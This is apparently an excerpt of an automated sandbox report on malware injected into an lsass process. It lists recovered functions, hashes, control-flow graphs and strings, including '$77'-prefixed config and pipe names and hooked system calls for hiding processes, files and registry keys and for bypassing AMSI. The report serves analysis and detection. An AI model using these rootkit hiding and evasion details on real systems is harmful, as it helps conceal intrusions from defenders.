                                                                                                                                  • Opcode Fuzzy Hash: e8873b674f2e359e5f96541e43b59108724062fc4a870e8b19e24c4a97edadbc
                                                                                                                                  • Instruction Fuzzy Hash: 1E414C76218B8086EB60CB24E8443EE77A1F79875CF540625EA8D46B99EF39C759CB00
                                                                                                                                  Function 00000213BDCED7D8 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1164774033-0
                                                                                                                                  • Opcode ID: de3a4f1c4722aca2eb904f336336930601643f7c9dfe6b9c18223e648004d9fa
                                                                                                                                  • Instruction ID: cf6ac5b1a9e86a2521198b2e32c1af8058d72df7ad4a2636c085444f7a5d9a27
                                                                                                                                  • Opcode Fuzzy Hash: de3a4f1c4722aca2eb904f336336930601643f7c9dfe6b9c18223e648004d9fa
                                                                                                                                  • Instruction Fuzzy Hash: E6A12BB270C6854AFF20CB75E4483ED6BA2E361B9CF144135DE5D2BA95EA36D742C700
                                                                                                                                  Function 00000213BDCE1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                  • String ID: SOFTWARE\$77config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                  • API String ID: 2135414181-649645306
                                                                                                                                  • Opcode ID: 450dbbf1704afe51d16eaedd2f846ad832dc3a6968aef11f1843edb122fe1598
                                                                                                                                  • Instruction ID: bea9e3adb638d99d7d5f02a25bf70d789e944c5ef2d132cafb8765373d39321c
                                                                                                                                  • Opcode Fuzzy Hash: 450dbbf1704afe51d16eaedd2f846ad832dc3a6968aef11f1843edb122fe1598
                                                                                                                                  • Instruction Fuzzy Hash: 3A711A76314A5486EF10DF65E8986D927A6FBA4B8CF402121DE4D47B2DEF36C758C340
                                                                                                                                  Function 00000213BDCE1E38 Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 00000213BDCE1E43
                                                                                                                                    • Part of subcall function 00000213BDCE21BC: GetModuleHandleA.KERNEL32(?,?,?,00000213BDCE1E75), ref: 00000213BDCE21D4
                                                                                                                                    • Part of subcall function 00000213BDCE21BC: GetProcAddress.KERNEL32(?,?,?,00000213BDCE1E75), ref: 00000213BDCE21E5
                                                                                                                                    • Part of subcall function 00000213BDCE6030: GetCurrentThreadId.KERNEL32 ref: 00000213BDCE606B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                                                                                  • API String ID: 4175298099-4225371247
                                                                                                                                  • Opcode ID: 6191e1ab36bf222c83b8ad8c498c744b26cf75ee4eb45f907204208c319144d1
                                                                                                                                  • Instruction ID: 36312f5fc53f48356afe37fe4d5157aec4b53c720f462a5172db8e48b0d0678e
                                                                                                                                  • Opcode Fuzzy Hash: 6191e1ab36bf222c83b8ad8c498c744b26cf75ee4eb45f907204208c319144d1
                                                                                                                                  • Instruction Fuzzy Hash: A04195B4218A4EA2EF00DFA9ED997D46323ABA534CF801427D5094617AFE7AD74DC390
                                                                                                                                  Function 00000213BDCE12B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                  • String ID: d
                                                                                                                                  • API String ID: 2005889112-2564639436
                                                                                                                                  • Opcode ID: a54fc127e61d0168aa516e5340f5f1e347c27459d257a44bc878666ad7d983e8
                                                                                                                                  • Instruction ID: f46d9d00b641c82dd49d66ed82615e4656ebc71f5d832447b7c61065e244896a
                                                                                                                                  • Opcode Fuzzy Hash: a54fc127e61d0168aa516e5340f5f1e347c27459d257a44bc878666ad7d983e8
                                                                                                                                  • Instruction Fuzzy Hash: 51511872618B8486EB54CF62E4483DA7BA2F798B9CF448124DA4A0B75CEF3DD659C700
                                                                                                                                  Function 00000213BDCEED48 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                                                                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                                                                                                  • API String ID: 740688525-1880043860
                                                                                                                                  • Opcode ID: 89f5c5e66e1b755f5237e9f7541e1364ddeb157113d91c30ac669978387284b4
                                                                                                                                  • Instruction ID: 4502c895ab1fe3b1d73ea4d44696d36590b2ccf205ce40937956b7a67e02ed4a
                                                                                                                                  • Opcode Fuzzy Hash: 89f5c5e66e1b755f5237e9f7541e1364ddeb157113d91c30ac669978387284b4
                                                                                                                                  • Instruction Fuzzy Hash: F651C07130974892EE25DB56A8083E92256AB68BFCF580734DE3947BC4FF3AE7458200
                                                                                                                                  Function 00000213BDCE3178 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                                                                                  • String ID: \GPU Engine(*)\Running Time
                                                                                                                                  • API String ID: 1943346504-1805530042
                                                                                                                                  • Opcode ID: 1e0206962784cbb59066502de87d8a89b87f36d7e7391f794394394ba1b10176
                                                                                                                                  • Instruction ID: 64854d68af4cac7f26b609f14a3b2b9ff70b1083fdd0274c72203581a0ba7109
                                                                                                                                  • Opcode Fuzzy Hash: 1e0206962784cbb59066502de87d8a89b87f36d7e7391f794394394ba1b10176
                                                                                                                                  • Instruction Fuzzy Hash: 0E31D672618E5493EF11DF12E80C3D9A7A2F7A8B8DF444524DE8947A69EF39E7098700
                                                                                                                                  Function 00000213BDCE3288 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                                                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                                                                                                  • API String ID: 1943346504-3507739905
                                                                                                                                  • Opcode ID: 9639e886c49eaef89c86f9b1444dfaf1491e17b7a6c502a98820b8b399e89069
                                                                                                                                  • Instruction ID: 275d1f19854526e7e31d5c99d84d2317ecbce8a55035cee0f0981a8bfb8f0421
                                                                                                                                  • Opcode Fuzzy Hash: 9639e886c49eaef89c86f9b1444dfaf1491e17b7a6c502a98820b8b399e89069
                                                                                                                                  • Instruction Fuzzy Hash: 44318471618F4586EB10DB12E44CBD967A2B7A4F8DF4440259E4A47765EF39E70A8600
                                                                                                                                  Function 00000213BDCE9FEC Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 423 213bdce9fec-213bdcea054 call 213bdceaf04 426 213bdcea05a-213bdcea05d 423->426 427 213bdcea4b5-213bdcea4bb call 213bdcec148 423->427 426->427 428 213bdcea063-213bdcea069 426->428 430 213bdcea06f-213bdcea073 428->430 431 213bdcea138-213bdcea14a 428->431 430->431 435 213bdcea079-213bdcea084 430->435 433 213bdcea150-213bdcea154 431->433 434 213bdcea405-213bdcea409 431->434 433->434 436 213bdcea15a-213bdcea165 433->436 438 213bdcea442-213bdcea44c call 213bdce90e4 434->438 439 213bdcea40b-213bdcea412 434->439 435->431 437 213bdcea08a-213bdcea08f 435->437 436->434 440 213bdcea16b-213bdcea16f 436->440 437->431 441 213bdcea095-213bdcea09f call 213bdce90e4 437->441 438->427 452 213bdcea44e-213bdcea46d call 213bdce7e30 438->452 439->427 442 213bdcea418-213bdcea43d call 213bdcea4bc 439->442 444 213bdcea335-213bdcea341 440->444 445 213bdcea175-213bdcea1b0 call 213bdce94c4 440->445 441->452 456 213bdcea0a5-213bdcea0d0 call 213bdce90e4 * 2 call 213bdce97cc 441->456 442->438 444->438 449 213bdcea347-213bdcea34b 444->449 445->444 461 213bdcea1b6-213bdcea1bf 445->461 453 213bdcea34d-213bdcea359 call 213bdce978c 449->453 454 213bdcea35b-213bdcea363 449->454 453->454 467 213bdcea37c-213bdcea384 453->467 454->438 460 213bdcea369-213bdcea376 call 213bdce9364 454->460 491 213bdcea0d2-213bdcea0d6 456->491 492 213bdcea0f0-213bdcea0fa call 213bdce90e4 456->492 460->438 460->467 465 213bdcea1c3-213bdcea1f5 461->465 469 213bdcea1fb-213bdcea207 465->469 470 213bdcea328-213bdcea32f 465->470 472 213bdcea38a-213bdcea38e 467->472 473 213bdcea498-213bdcea4b4 call 213bdce90e4 * 2 call 213bdcec0b4 467->473 469->470 474 213bdcea20d-213bdcea22c 469->474 470->444 470->465 476 213bdcea3a1 472->476 477 213bdcea390-213bdcea39f call 213bdce978c 472->477 473->427 478 213bdcea232-213bdcea26f call 213bdce97a0 * 2 474->478 479 213bdcea318-213bdcea31d 474->479 486 213bdcea3a3-213bdcea3ad call 213bdceaf9c 476->486 477->486 503 213bdcea2a2-213bdcea2a5 478->503 479->470 486->438 500 213bdcea3b3-213bdcea403 call 213bdce93f4 call 213bdce95f8 486->500 491->492 497 213bdcea0d8-213bdcea0e3 491->497 492->431 506 213bdcea0fc-213bdcea11c call 213bdce90e4 * 2 call 213bdceaf9c 492->506 497->492 499 213bdcea0e5-213bdcea0ea 497->499 499->427 499->492 500->438 509 213bdcea271-213bdcea297 call 213bdce97a0 call 213bdcea72c 503->509 510 213bdcea2a7-213bdcea2ae 503->510 528 213bdcea11e-213bdcea128 call 213bdceb08c 506->528 529 213bdcea133 506->529 524 213bdcea2b9-213bdcea316 call 213bdce9f18 509->524 525 213bdcea299-213bdcea29c 509->525 514 213bdcea31f 510->514 515 213bdcea2b0-213bdcea2b4 510->515 519 213bdcea324 514->519 515->478 519->470 524->519 525->503 533 213bdcea492-213bdcea497 call 213bdcec0b4 528->533 534 213bdcea12e-213bdcea491 call 213bdce8d44 call 213bdceaae8 call 213bdce8f38 528->534 529->431 533->473 534->533
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                  • Opcode ID: 9e9a052f380ae36a22c7ac5ba5d0289ca659db317daadf64a872ab054cbc62a4
                                                                                                                                  • Instruction ID: a92af46b7b5b71cf65aaae097fec42ab6efc1618d0af6e60a31c9ed7b3840b2a
                                                                                                                                  • Opcode Fuzzy Hash: 9e9a052f380ae36a22c7ac5ba5d0289ca659db317daadf64a872ab054cbc62a4
                                                                                                                                  • Instruction Fuzzy Hash: EBD17CB25087888AEF20CF2594483DD77A2F76579CF100225EA8D97B96EB36E781C704
                                                                                                                                  Function 00000213BDCB93EC Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000003.1465302178.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_3_213bdcb0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                  • Opcode ID: 3884363ef5fed76742796f8538938bfe25b25e9dae83a2dc69048c1d4c6ad6c5
                                                                                                                                  • Instruction ID: d45e3b2ed8ecbdecce267b8202fa559070e6fcbf5107c787d19df8e591db04ce
                                                                                                                                  • Opcode Fuzzy Hash: 3884363ef5fed76742796f8538938bfe25b25e9dae83a2dc69048c1d4c6ad6c5
                                                                                                                                  • Instruction Fuzzy Hash: 3BD19D32648B488AEF64DF6594483DD37A2F76978CF100215EE8957B96EF36C381CB40
                                                                                                                                  Function 00000213BDCE104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 544 213bdce104c-213bdce10b9 RegQueryInfoKeyW 545 213bdce10bf-213bdce10c9 544->545 546 213bdce11b5-213bdce11d0 544->546 545->546 547 213bdce10cf-213bdce111f RegEnumValueW 545->547 548 213bdce11a5-213bdce11af 547->548 549 213bdce1125-213bdce112a 547->549 548->546 548->547 549->548 550 213bdce112c-213bdce1135 549->550 551 213bdce1147-213bdce114c 550->551 552 213bdce1137 550->552 554 213bdce114e-213bdce1193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 551->554 555 213bdce1199-213bdce11a3 551->555 553 213bdce113b-213bdce113f 552->553 553->548 556 213bdce1141-213bdce1145 553->556 554->555 555->548 556->551 556->553
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                  • String ID: d
                                                                                                                                  • API String ID: 3743429067-2564639436
                                                                                                                                  • Opcode ID: 4d659206498d04cf2c755275944e0373eee03599aa096e77f7991030ce63d003
                                                                                                                                  • Instruction ID: 22600717cc6a7e8dc3bf2a8b803b997a987d0d42238187ec976b7a682b33e61e
                                                                                                                                  • Opcode Fuzzy Hash: 4d659206498d04cf2c755275944e0373eee03599aa096e77f7991030ce63d003
                                                                                                                                  • Instruction Fuzzy Hash: 32417F73218B84C6EB60CF21E44879A77A2F388B9CF448125DB894B75CEF39D659CB40
                                                                                                                                  Function 00000213BDCE242C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                                                                                  • String ID: \\.\pipe\$77childproc
                                                                                                                                  • API String ID: 166002920-421986751
                                                                                                                                  • Opcode ID: 6b478bf275f7f707eec9553fd3cd4fa2dc87a7a9d36fcded0365874d1676b014
                                                                                                                                  • Instruction ID: c8a60c52956f598d8f3063309a4119c09887092860eac6659d4b426bee2e2774
                                                                                                                                  • Opcode Fuzzy Hash: 6b478bf275f7f707eec9553fd3cd4fa2dc87a7a9d36fcded0365874d1676b014
                                                                                                                                  • Instruction Fuzzy Hash: 43114F31628B4083EB10CB21F4587996B61F799BECF544215EB9906AACDF3DC758CB44
                                                                                                                                  Function 00000213BDCE7A10 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                  • Opcode ID: 000656d6fc5cc55633a5880fd40a0c0c08ef8f78df8bf0495dc394bdb70342b6
                                                                                                                                  • Instruction ID: 4d131d723dfdcd50980dab0133fe6db942d4e7479698aba863573010cd8919ea
                                                                                                                                  • Opcode Fuzzy Hash: 000656d6fc5cc55633a5880fd40a0c0c08ef8f78df8bf0495dc394bdb70342b6
                                                                                                                                  • Instruction Fuzzy Hash: E58104B060C74987FE54EB66E45D3E96693ABB178CF644434AA04477D6FB3BEB068300
                                                                                                                                  Function 00000213BDCB6E10 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000003.1465302178.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_3_213bdcb0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                  • Opcode ID: 4cfe563361612e673ca8ea5c27d7c1653f9d4d75b0ebbab1fe199f08d0a2e3d7
                                                                                                                                  • Instruction ID: a8ca6342e7c158e2d431ef57dd4bafd73fca06972d6f43405d452a5c0f337849
                                                                                                                                  • Opcode Fuzzy Hash: 4cfe563361612e673ca8ea5c27d7c1653f9d4d75b0ebbab1fe199f08d0a2e3d7
                                                                                                                                  • Instruction Fuzzy Hash: 5E81DF3068D34946FE50DB65E84D3D927E3AB71B8CF684425AE484B7D2FA3BCB458700
                                                                                                                                  Function 00000213BDCE986C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000213BDCE9A2B,?,?,?,00000213BDCE921C,?,?,?,?,00000213BDCE8D25), ref: 00000213BDCE98F1
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000213BDCE9A2B,?,?,?,00000213BDCE921C,?,?,?,?,00000213BDCE8D25), ref: 00000213BDCE98FF
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000213BDCE9A2B,?,?,?,00000213BDCE921C,?,?,?,?,00000213BDCE8D25), ref: 00000213BDCE9929
